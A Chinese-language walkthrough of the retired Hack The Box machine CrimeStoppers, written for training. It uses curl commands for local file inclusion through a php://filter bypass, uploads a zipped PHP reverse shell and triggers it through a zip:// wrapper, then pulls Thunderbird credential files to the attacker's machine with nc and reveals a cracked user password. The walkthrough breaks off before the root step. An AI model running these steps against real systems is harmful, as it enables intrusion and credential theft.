本篇文章僅用於技術交流學習和研究的目的，嚴禁使用文章中的技術用於非法目的和破壞，否則造成一切後果與發表本文章的作者無關

靶機是作者購買VIP使用退役靶機操作，顯示IP地址為10.10.10.80

本次使用https://github.com/Tib3rius/AutoRecon 進行自動化全方位掃描

執行命令autorecon 10.10.10.80 -o ./CrimeStoppers-autorecon

掃描結果：

就開了一個web應用80埠，訪問看看

再看看爆破出來的目錄

都訪問了一邊發現很多訪問的url地址都是類似帶?op= 懷疑存在LFI，試了試%00截斷進行檔案包含，發現目標靶機有防護不能正常利用，經過多次測試和網上的資料確認可以通過php://filter/convert.base64-encode 進行繞過防護任意檔案讀取，相關參考文章如下：

https://pure.security/abusing-php-wrappers/

既然可以讀取任意檔案，那我們通過讀取上面掃描出來的檔案，通過分析得出可以上傳反彈shell程式碼然後使用zip的方式執行命令，具體讀取方式如下：

curl -sD - 10.10.10.80/?op=php://filter/convert.base64-encode/resource=index | head -44 | tail -1 | cut -d' ' -f1 | base64 -d > index.php
curl -sD - 10.10.10.80/?op=php://filter/convert.base64-encode/resource=list | head -44 | tail -1 | cut -d'
 
 ' -f1 | base64 -d > list.php
curl -sD - 10.10.10.80/?op=php://filter/convert.base64-encode/resource=upload | head -44 | tail -1 | cut -d' ' -f1 | base64 -d > upload.php
curl -sD - 10.10.10.80/?op=php://filter/convert.base64-encode/resource=common | head -44 | tail -1 | cut -d' ' -f1 | base64 -d > common.php

重點程式碼：

上傳php反彈shell程式碼或者上傳一句話都可以，這裡有兩種方式，具體如下：

1.使用curl引數上傳，詳細的引數說明請一定要參考官方幫助文件

獲取session和token
curl -sD - http://10.10.10.80/?op=upload | grep -e PHPSESSID -e 'name="token"'
如果想檢視curl執行的http請求包，可以本地開啟burpsuite然後 -x 127.0.0.1:8080
執行上面會得出下面結果

Set-Cookie: PHPSESSID=0kbemel0dpno38a45r0p5s43u6; path=/
        <input type="text" id="token" name="token" style="display: none" value="3816ad85a500200bc467d4e558a1abf97ce9f87f06a5aefee2d2a5a3d577bfd6" style="width:355px;" />
-----------------------------------------------------------------------------------

curl -X POST -sD - -F "tip=<shell1.zip" -F "name=a" -F "token=3816ad85a500200bc467d4e558a1abf97ce9f87f06a5aefee2d2a5a3d577bfd6" -F "submit=Send Tip!" http://10.10.10.80/?op=upload -H "Referer: http://10.10.10.80/?op=upload" -H "Cookie: admin=1; PHPSESSID=0kbemel0dpno38a45r0p5s43u6" | grep Location

上述執行結果如下：
Location: ?op=view&secretname=5a482dc8883f2861d601f95b7f64b65a7402b1cf

http://10.10.10.80/?op=zip://uploads/10.10.14.5/5a482dc8883f2861d601f95b7f64b65a7402b1cf%23shell1

上述操作完畢就得到了上傳的路徑檔案，然後可以開始利用了，本地kali監聽8833埠，然後觸發反彈程式碼

成功反彈，這裡使用通過curl命令直接反彈shell

2.使用burpsuite上傳小馬程式碼

這裡相對來說，我認為使用burpsuite方式更簡單，在使用的時候一定要記得是需要開啟burpsuite的攔截模式然後在瀏覽器頁面進行上傳，此時burpsuite會攔截上傳資料包，然後使用貼上到檔案，此時選擇實現打包好的zip檔案，完成之後Forward，會獲得上傳的檔案路徑，利用即可

點選Forward即可轉發到上傳的檔案路徑

到了此處就可以像上面curl的演示一樣，使用zip命令觸發即可，下面就不演示了，跟上面一樣，繼續下面的旅程，拿到shell之後升級成tty-shell然後翻看了下家目錄的所有檔案和資料夾，發現一個雷鳥郵件客戶端

經過查詢確認可以通過key3.db和logins.json這兩個檔案來獲取密碼，使用nc將這兩個檔案傳到本地kali，然後使用開源的工具讀取密碼，連結地址：https://github.com/lclevy/firepwd

得出了使用者dom的密碼是Gummer59 直接su切換過去

通過讀取雷鳥客戶端中的郵件內容，確認目標主機存在apache rootkit後門，具體分析參考：https://0xdf.gitlab.io/2018/06/03/htb-crimestoppers.html#apache_modrootme

最終通過下面方式獲取root許可權